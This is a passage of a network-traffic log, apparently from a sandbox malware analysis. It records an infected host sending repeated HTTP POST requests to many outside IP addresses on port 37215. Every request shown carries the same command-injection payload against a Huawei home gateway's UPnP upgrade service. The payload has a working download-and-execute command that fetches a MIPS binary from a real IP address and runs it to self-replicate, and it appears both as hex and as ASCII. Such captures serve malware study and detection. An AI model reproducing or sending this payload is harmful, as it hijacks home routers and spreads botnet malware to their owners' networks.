2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1574192.168.2.1333054197.68.176.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586369991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1575192.168.2.133720241.74.151.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586380005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1576192.168.2.1333770197.38.97.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586395979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1577192.168.2.133750841.243.99.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586414099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1578192.168.2.135143041.228.162.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586560011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1579192.168.2.135068641.20.198.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586585045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1580192.168.2.1358942157.172.95.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586605072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1581192.168.2.133757065.178.109.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586621046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1582192.168.2.134145241.152.74.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586637974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1583192.168.2.1337486102.36.140.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586652040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1584192.168.2.1340754157.205.101.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.586666107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
